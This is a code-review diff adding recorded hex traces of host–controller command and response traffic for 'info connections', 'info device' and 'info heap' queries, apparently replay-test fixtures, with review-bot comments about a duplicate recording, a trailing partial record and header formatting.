TX 0108004dfc05c73d200051
RX 0000000900000009000000020000000000e269c211bdb8a1
RX 014dfc05c73d200051
RX 0000005800000058
RX 000000030000000000e269c2
RX 11bded98
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05183e2000fb
RX 0000000900000009000000020000000000e269c211bfb647
RX 01
RX 4dfc05183e2000fb
RX 0000010200000102
RX 000000030000000000e269c2
RX 11bfe6b2
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05133f200051
RX 0000000900000009000000020000000000e269c211c1aa86
RX 014dfc05133f200051
RX 00000058
RX 00000058000000030000000000e269c2
RX 11c1da6e
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05643f2000fb
RX 0000000900000009000000020000000000e269c2
RX 11c31d18
RX 014dfc05643f2000fb
RX 00000102000001020000000300000000
RX 00e269c211c35297
RX 04
RX 0eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc055f40200051
RX 000000090000000900000002
RX 0000000000e269c211c51823
RX 014dfc055f40200051
RX 00000058
RX 000000580000000300000000
RX 00e269c211c54c9e
RX 04
RX 0e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05b0402000fb
RX 000000090000000900000002
RX 0000000000e269c211c689b0
RX 014dfc05b0402000fb
RX 00000102
RX 000001020000000300000000
RX 00e269c211c6bf30
RX 04
RX 0eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05ab41200051
RX 000000090000000900000002
RX 0000000000e269c2
RX 11c88437
RX 014dfc05ab41200051
RX 00000058
RX 000000580000000300000000
RX 00e269c211c8ba69
RX 04
RX 0e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05fc412000fb
RX 000000090000000900000002
RX 0000000000e269c211c9f7a0
RX 014dfc05fc412000fb
RX 00000102
RX 00000102000000030000000000e269c2
RX 11ca2c9d
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05f742200051
RX 000000090000000900000002
RX 0000000000e269c211cbee6a
RX 014dfc05f742200051
RX 00000058
RX 00000058000000030000000000e269c2
RX 11cc2779
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc0548432000fb
RX 0000000900000009000000020000000000e269c2
RX 11cde3be
RX 014dfc0548432000fb
RX 00000102
RX 000001020000000300000000
RX 00e269c211ce175c
RX 04
RX 0eff014dfc000900000000000000000000000000000000000000000000000000777700c91000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005000000007d0000007d00000c001eff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002800000000000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff0000000100000000000000f0ff0000000000000000000001c4000000000000
TX 0108004dfc054344200051
RX 0000000900000009000000020000000000e269c2
RX 11cf5a52
RX 014dfc054344200051
RX 000000580000005800000003
RX 0000000000e269c211cf8917
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc0594442000fb
RX 0000000900000009000000020000000000e269c211d14fcf
RX 01
RX 4dfc0594442000fb
RX 0000010200000102
RX 000000030000000000e269c211d182db
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc058f45200051
RX 0000000900000009000000020000000000e269c2
RX 11d2c911
RX 014dfc058f45200051
RX 00000058000000580000000300000000
RX 00e269c211d2f819
RX 04
RX 0e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05e0452000fb
RX 0000000900000009
RX 000000020000000000e269c211d4c00a
RX 014dfc05e0452000fb
RX 00000102
RX 00000102000000030000000000e269c2
RX 11d4fa18
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05db46200051
RX 0000000900000009
RX 000000020000000000e269c211d6b5d7
RX 014dfc05db46200051
RX 00000058
RX 00000058000000030000000000e269c2
RX 11d6efa7
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Socket closed
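Review bot: missing documentation on this trace: its closing command sequence (TX 0108004dfc0594442000fb, TX 0108004dfc058f45200051, TX 0108004dfc05e0452000fb, TX 0108004dfc05db46200051) is the same sequence that closes the "# info connections" trace added in the next file, and the two differ only in the timestamps carried in the 24-byte RX record headers (00e269c2... here versus 00e26b46... there). Add a comment line naming the device or firmware this capture was taken on so the two recordings can be told apart, or drop this one if it is simply a duplicate recording of the same command.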
@@ -0,0 +1,168 @@
# info connections
TX 010300011000
RX 0000000400000004000000020000000000e26b46e2c309cc
RX 01011000
RX 0000000f0000000f000000030000000000e26b46e2c3274f
RX 04
RX 0e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc05e8382000fb
RX 000000030000000300000003
RX 0000000000e26b46e2c428e8
RX 07
RX f001
RX 0000000900000009000000020000000000e26b46
RX e2c446b6
RX 014dfc05e8382000fb
RX 00000102000001020000000300000000
RX 00e26b46e2c46686
RX 04
RX 0eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05e339200051
RX 0000000900000009000000020000000000e26b46e2c54298
RX 01
RX 4dfc05e339200051
RX 0000005800000058
RX 000000030000000000e26b46e2c55b0a
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05343a2000fb
RX 0000000900000009000000020000000000e26b46e2c66e34
RX 014dfc05343a2000fb
RX 000001020000010200000003
RX 0000000000e26b46e2c68443
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc052f3b200051
RX 000000090000000900000002
RX 0000000000e26b46e2c790ea
RX 014dfc052f3b200051
RX 00000058000000580000000300000000
RX 00e26b46e2c7af14
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05803b2000fb
RX 000000090000000900000002
RX 0000000000e26b46e2c8a5a1
RX 014dfc05803b2000fb
RX 00000102000001020000000300000000
RX 00e26b46e2c8c6f1
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc057b3c200051
RX 0000000900000009000000020000000000e26b46e2c987eb
RX 014dfc057b3c200051
RX 0000005800000058000000030000000000e26b46
RX e2c9a0dd
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05cc3c2000fb
RX 000000090000000900000002
RX 0000000000e26b46e2caa510
RX 014dfc05cc3c2000fb
RX 0000010200000102000000030000000000e26b46
RX e2cac525
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05c73d200051
RX 0000000900000009000000020000000000e26b46e2cbcf4b
RX 01
RX 4dfc05c73d200051
RX 000000580000005800000003
RX 0000000000e26b46e2cbf034
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05183e2000fb
RX 0000000900000009000000020000000000e26b46e2cca023
RX 014dfc05183e2000fb
RX 000001020000010200000003
RX 0000000000e26b46e2ccc67f
RX 04
RX 0eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05133f200051
RX 00000009000000090000000200000000
RX 00e26b46e2cda8a4
RX 01
RX 4dfc05133f200051
RX 0000005800000058000000030000000000e26b46e2cdce30
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05643f2000fb
RX 0000000900000009000000020000000000e26b46
RX e2ced9d5
RX 014dfc05643f2000fb
RX 000001020000010200000003
RX 0000000000e26b46e2cef558
RX 04
RX 0eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc055f40200051
RX 000000090000000900000002
RX 0000000000e26b46e2cf504b
RX 014dfc055f40200051
RX 00000058000000580000000300000000
RX 00e26b46e2cf73b7
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05b0402000fb
RX 000000090000000900000002
RX 0000000000e26b46e2d06c12
RX 014dfc05b0402000fb
RX 0000010200000102000000030000000000e26b46
RX e2d093f7
RX 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
TX 0108004dfc05ab41200051
RX 000000090000000900000002
RX 0000000000e26b46e2d18faa
RX 014dfc05ab41200051
RX 0000005800000058000000030000000000e26b46e2d1ade2
RX 040e55014dfc000000000000000000000000000000000000a4000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000400000001000000
TX 0108004dfc05fc412000fb
RX 0000000900000009000000020000000000e26b46e2d2b2dd
RX 014dfc05fc412000fb
RX 0000010200000102000000030000000000e26b46e2d2ceb2
RX 040eff014dfc000800000000000000000000000000000000000000000000000000777700c91000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005000000007d0000007d00000b001eff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002800000000000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff0000000100000000000000f0ff0000000000000000000001c4000000000000
TX 0108004dfc05f742200051
RX 0000000900000009000000020000000000e26b46e2d3c699
RX 01
RX 4dfc05f742200051
RX 00000058000000580000000300000000
RX 00e26b46e2d3e510
RX 04
RX 0e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc0548432000fb
RX 0000000900000009000000020000000000e26b46e2d563ce
RX 014dfc0548432000fb
RX 00000102000001020000000300000000
RX 00e26b46e2d57e0a
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc054344200051
RX 0000000900000009000000020000000000e26b46e2d62821
RX 014dfc054344200051
RX 000000580000005800000003
RX 0000000000e26b46e2d63ad6
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc0594442000fb
RX 0000000900000009
RX 000000020000000000e26b46
RX e2d6c43c
RX 014dfc0594442000fb
RX 00000102000001020000000300000000
RX 00e26b46e2d6ebde
RX 04
RX 0eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc058f45200051
RX 0000000900000009000000020000000000e26b46e2d7daf3
RX 01
RX 4dfc058f45200051
RX 00000058000000580000000300000000
RX 00e26b46e2d7fab5
RX 04
RX 0e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05e0452000fb
RX 0000000900000009
RX 000000020000000000e26b46
RX e2d8ed9a
RX 014dfc05e0452000fb
RX 00000102000001020000000300000000
RX 00e26b46e2d91d63
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05db46200051
RX 0000000900000009
RX 000000020000000000e26b46
RX e2da0321
RX 014dfc05db46200051
RX 0000005800000058000000030000000000e26b46e2da2145
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
RX 0000001a
Socket closed
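Review bot: possible logic problem at the end of the hunk: the line "RX 0000001a" sits between the last complete response ("RX 040e55014dfc0000...") and "Socket closed", and at four bytes it looks like the first field of another 24-byte record header (every other RX packet in this trace is preceded by one such header, starting with the record length repeated twice) that was never completed before the capture ended. If the replay harness consumes the trace record by record, this fragment will either be left unconsumed or make the test wait for the remaining 20 header bytes; either strip it from the recording or document that a trailing partial record is expected here.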
+44
View File
@@ -0,0 +1,44 @@
#info device
TX 010300011000
RX 00000004
RX 00000004
RX 00000002
RX 00000000
RX 00e269c2
RX 1010a0f2
RX 01
RX 011000
RX 0000000f
RX 0000000f
RX 00000003
RX 00000000
RX 00e269c2
RX 1010e99d
RX 04
RX 0e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc052c0c210006
RX 0000000300000003000000030000000000e269c210128aa7
RX 07f001
RX 000000090000000900000002
RX 0000000000e269c210129ad2
RX 014dfc052c0c210006
RX 0000000d
RX 0000000d000000030000000000e269c2
RX 1012a345
RX 040e0a014dfc00f1037dc795f8
TX 0108004dfc05b4782100fb
RX 0000000900000009000000020000000000e269c210130715
RX 014dfc05b4782100fb
RX 0000010200000102000000030000000000e269c2
RX 10130fc0
RX 04
RX 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
TX 0108004dfc05af79210007
RX 0000000900000009000000020000000000e269c210138340
RX 01
RX 4dfc05af79210007
RX 0000000e0000000e00000003
RX 0000000000e269c210138aa9
RX 040e0b014dfc00037dc795f80461
Socket closed
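Review bot: style point on the first line: "#info device" is missing the space after "#" that the other trace headers use ("# info connections", "# info heap"). If anything parses that first comment line to identify the command being replayed, the inconsistency will bite; suggest "# info device". Related, the opening record header here is split into six single-dword lines ("RX 00000004", "RX 00000004", "RX 00000002", ...) where the other traces mostly keep a header on one line, which is only safe if the replay reassembles RX bytes before matching rather than comparing line by line; worth confirming that is the case.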
+685
View File
@@ -0,0 +1,685 @@
# info heap
TX 010300011000
RX 0000000400000004000000020000000000e269c200a6dc56
RX 01011000
RX 0000000f0000000f000000030000000000e269c2
RX 00a717ec
RX 04
RX 0e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc059430200004
RX 000000030000000300000003
RX 0000000000e269c200a87965
RX 07f001
RX 00000009000000090000000200000000
RX 00e269c200a8e193
RX 01
RX 4dfc059430200004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00a918e2
RX 040e08014dfc00c85d2000
TX 0108004dfc05c85d200030
RX 000000090000000900000002
RX 0000000000e269c200aab793
RX 014dfc05c85d200030
RX 00000037
RX 000000370000000300000000
RX 00e269c200aaf0ec
RX 04
RX 0e34014dfc00434f4c42000000000700000008000000a4792100a479210020010000200000000000000000000000f85d200068ec2000
TX 0108004dfc05a479210004
RX 000000090000000900000002
RX 0000000000e269c200acb1ba
RX 014dfc05a479210004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200ace5c2
RX 04
RX 0e08014dfc00c85d2000
TX 0108004dfc05c879210004
RX 000000090000000900000002
RX 0000000000e269c200ae2501
RX 014dfc05c879210004
RX 0000000b0000000b0000000300000000
RX 00e269c200ae5915
RX 04
RX 0e08014dfc00587a2100
TX 0108004dfc05ec79210004
RX 0000000900000009000000020000000000e269c200b01eae
RX 01
RX 4dfc05ec79210004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200b04d6c
RX 04
RX 0e08014dfc007c7a2100
TX 0108004dfc05107a210004
RX 0000000900000009000000020000000000e269c200b19061
RX 014dfc05107a210004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200b1c4f3
RX 04
RX 0e08014dfc00c8792100
TX 0108004dfc05347a210004
RX 0000000900000009000000020000000000e269c200b38d00
RX 01
RX 4dfc05347a210004
RX 0000000b0000000b
RX 000000030000000000e269c200b3bbaa
RX 040e08014dfc00c85d2000
TX 0108004dfc05587a210004
RX 0000000900000009000000020000000000e269c200b58252
RX 014dfc05587a210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00b5b18b
RX 040e08014dfc00ec792100
TX 0108004dfc057c7a210004
RX 0000000900000009000000020000000000e269c200b6f455
RX 014dfc057c7a210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00b728c4
RX 040e08014dfc00a07a2100
TX 0108004dfc05a07a210004
RX 000000090000000900000002
RX 0000000000e269c200b8f1d6
RX 014dfc05a07a210004
RX 0000000b0000000b000000030000000000e269c2
RX 00b92612
RX 040e08014dfc0000000000
TX 0108004dfc05f85d200030
RX 0000000900000009
RX 000000020000000000e269c2
RX 00ba65be
RX 014dfc05f85d200030
RX 00000037000000370000000300000000
RX 00e269c200ba9b76
RX 04
RX 0e34014dfc00434f4c42000000000700000008000000087b2100c47a210020020000400000000000000000000000285e2000c85d2000
TX 0108004dfc05c47a210004
RX 000000090000000900000002
RX 0000000000e269c200bc6390
RX 014dfc05c47a210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00bc987e
RX 04
RX 0e08014dfc00087b2100
TX 0108004dfc05087b210004
RX 0000000900000009000000020000000000e269c2
RX 00bdd708
RX 014dfc05087b210004
RX 0000000b0000000b0000000300000000
RX 00e269c200be075f
RX 04
RX 0e08014dfc004c7b2100
TX 0108004dfc054c7b210004
RX 0000000900000009000000020000000000e269c200bfd07f
RX 014dfc054c7b210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00bfffe2
RX 040e08014dfc00907b2100
TX 0108004dfc05907b210004
RX 000000090000000900000002
RX 0000000000e269c200c1c264
RX 014dfc05907b210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00c1fba1
RX 040e08014dfc00d47b2100
TX 0108004dfc05d47b210004
RX 000000090000000900000002
RX 0000000000e269c200c339f3
RX 014dfc05d47b210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00c36f64
RX 040e08014dfc00187c2100
TX 0108004dfc05187c210004
RX 0000000900000009000000020000000000e269c200c53386
RX 014dfc05187c210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00c56249
RX 040e08014dfc005c7c2100
TX 0108004dfc055c7c210004
RX 0000000900000009000000020000000000e269c2
RX 00c6a64c
RX 014dfc055c7c210004
RX 0000000b0000000b0000000300000000
RX 00e269c200c6d51e
RX 04
RX 0e08014dfc00a07c2100
TX 0108004dfc05a07c210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00c8a176
RX 014dfc05a07c210004
RX 0000000b0000000b0000000300000000
RX 00e269c200c8daef
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc05285e200030
RX 0000000900000009
RX 000000020000000000e269c2
RX 00ca1661
RX 014dfc05285e200030
RX 000000370000003700000003
RX 0000000000e269c200ca4c0b
RX 040e34014dfc00434f4c42000000000a0000000a000000e47c2100e47c2100780a0000080100000000000000000000885e2000f85d2000
TX 0108004dfc05e47c210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00cc13aa
RX 014dfc05e47c210004
RX 0000000b0000000b0000000300000000
RX 00e269c200cc49c8
RX 04
RX 0e08014dfc00f07d2100
TX 0108004dfc05f07d210004
RX 00000009000000090000000200000000
RX 00e269c200ce084a
RX 014dfc05f07d210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00ce3d02
RX 040e08014dfc00fc7e2100
TX 0108004dfc05fc7e210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00cf7abc
RX 014dfc05fc7e210004
RX 0000000b0000000b0000000300000000
RX 00e269c200cfafff
RX 04
RX 0e08014dfc0008802100
TX 0108004dfc050880210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00d1718e
RX 014dfc050880210004
RX 0000000b0000000b0000000300000000
RX 00e269c200d1ad02
RX 040e08014dfc0014812100
TX 0108004dfc051481210004
RX 0000000900000009000000020000000000e269c200d2e49d
RX 01
RX 4dfc051481210004
RX 0000000b0000000b
RX 000000030000000000e269c200d313fc
RX 040e08014dfc0020822100
TX 0108004dfc052082210004
RX 0000000900000009000000020000000000e269c2
RX 00d4dfc6
RX 014dfc052082210004
RX 0000000b0000000b00000003
RX 0000000000e269c200d50e59
RX 040e08014dfc002c832100
TX 0108004dfc052c83210004
RX 00000009000000090000000200000000
RX 00e269c200d65308
RX 01
RX 4dfc052c83210004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00d68806
RX 040e08014dfc0038842100
TX 0108004dfc053884210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00d84aba
RX 014dfc053884210004
RX 0000000b0000000b00000003
RX 0000000000e269c200d88584
RX 040e08014dfc0044852100
TX 0108004dfc054485210004
RX 0000000900000009000000020000000000e269c2
RX 00da42d6
RX 014dfc054485210004
RX 0000000b0000000b00000003
RX 0000000000e269c200da7651
RX 040e08014dfc0050862100
TX 0108004dfc055086210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00dbba9e
RX 014dfc055086210004
RX 0000000b0000000b00000003
RX 0000000000e269c200dbf538
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc05885e200030
RX 00000009000000090000000200000000
RX 00e269c200ddb037
RX 01
RX 4dfc05885e200030
RX 000000370000003700000003
RX 0000000000e269c200dde9b6
RX 040e34014dfc00434f4c4200000000040000000400000024c6210024c62100b0100000280400000000000000000000585e2000285e2000
TX 0108004dfc0524c6210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00df268a
RX 014dfc0524c6210004
RX 0000000b0000000b0000000300000000
RX 00e269c200df5cd7
RX 040e08014dfc0050ca2100
TX 0108004dfc0550ca210004
RX 0000000900000009000000020000000000e269c2
RX 00e11eb6
RX 01
RX 4dfc0550ca210004
RX 0000000b0000000b00000003
RX 0000000000e269c200e15819
RX 040e08014dfc007cce2100
TX 0108004dfc057cce210004
RX 00000009000000090000000200000000
RX 00e269c200e29334
RX 01
RX 4dfc057cce210004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00e2c73e
RX 040e08014dfc00a8d22100
TX 0108004dfc05a8d2210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00e4925e
RX 014dfc05a8d2210004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200e4c673
RX 040e08014dfc0000000000
TX 0108004dfc05585e200030
RX 0000000900000009
RX 000000020000000000e269c2
RX 00e5ff65
RX 014dfc05585e200030
RX 000000370000003700000003
RX 0000000000e269c200e63326
RX 040e34014dfc00434f4c42000000001000000010000000d4d62100d4d621008044000044040000000000000000000038ec2000885e2000
TX 0108004dfc05d4d6210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00e7fcce
RX 014dfc05d4d6210004
RX 0000000b0000000b0000000300000000
RX 00e269c200e8313f
RX 040e08014dfc001cdb2100
TX 0108004dfc051cdb210004
RX 0000000900000009000000020000000000e269c200e9f3c0
RX 014dfc051cdb210004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00ea223f
RX 040e08014dfc0064df2100
TX 0108004dfc0564df210004
RX 00000009000000090000000200000000
RX 00e269c200eb6947
RX 01
RX 4dfc0564df210004
RX 0000000b0000000b00000003
RX 0000000000e269c200eb9dc8
RX 04
RX 0e08014dfc00ace32100
TX 0108004dfc05ace3210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00ed6025
RX 014dfc05ace3210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00edb820
RX 040e08014dfc00f4e72100
TX 0108004dfc05f4e7210004
RX 00000009000000090000000200000000
RX 00e269c200eeaa84
RX 014dfc05f4e7210004
RX 0000000b0000000b000000030000000000e269c200eeb23c
RX 04
RX 0e08014dfc003cec2100
TX 0108004dfc053cec210004
RX 0000000900000009
RX 000000020000000000e269c200ef25f0
RX 01
RX 4dfc053cec210004
RX 0000000b
RX 0000000b000000030000000000e269c200ef2e26
RX 04
RX 0e08014dfc0084f02100
TX 0108004dfc0584f0210004
RX 0000000900000009000000020000000000e269c200efa285
RX 014dfc0584f0210004
RX 0000000b
RX 0000000b000000030000000000e269c200efa979
RX 040e08014dfc00ccf42100
TX 0108004dfc05ccf4210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00f0207c
RX 014dfc05ccf4210004
RX 0000000b0000000b0000000300000000
RX 00e269c200f028c8
RX 04
RX 0e08014dfc0014f92100
TX 0108004dfc0514f9210004
RX 0000000900000009000000020000000000e269c200f0b8fd
RX 014dfc0514f9210004
RX 0000000b0000000b0000000300000000
RX 00e269c200f0bf4a
RX 040e08014dfc005cfd2100
TX 0108004dfc055cfd210004
RX 00000009000000090000000200000000
RX 00e269c200f11c7d
RX 01
RX 4dfc055cfd210004
RX 0000000b0000000b00000003
RX 0000000000e269c200f12aa4
RX 040e08014dfc00a4012200
TX 0108004dfc05a401220004
RX 0000000900000009000000020000000000e269c200f1946c
RX 014dfc05a401220004
RX 0000000b0000000b00000003
RX 0000000000e269c200f19f40
RX 040e08014dfc00ec052200
TX 0108004dfc05ec05220004
RX 0000000900000009000000020000000000e269c200f20f44
RX 01
RX 4dfc05ec05220004
RX 0000000b0000000b00000003
RX 0000000000e269c200f21b6a
RX 04
RX 0e08014dfc00340a2200
TX 0108004dfc05340a220004
RX 0000000900000009000000020000000000e269c200f29be7
RX 014dfc05340a220004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00f2b3bd
RX 040e08014dfc007c0e2200
TX 0108004dfc057c0e220004
RX 00000009
RX 00000009
RX 0000000200000000
RX 00e269c200f3a7c6
RX 01
RX 4dfc057c0e220004
RX 0000000b0000000b000000030000000000e269c2
RX 00f4951f
RX 040e08014dfc00c4122200
TX 0108004dfc05c412220004
RX 0000000900000009
RX 000000020000000000e269c200f637e5
RX 014dfc05c412220004
RX 0000000b0000000b000000030000000000e269c200f63f91
RX 040e08014dfc000c172200
TX 0108004dfc050c17220004
RX 00000009
RX 000000090000000200000000
RX 00e269c200f6f156
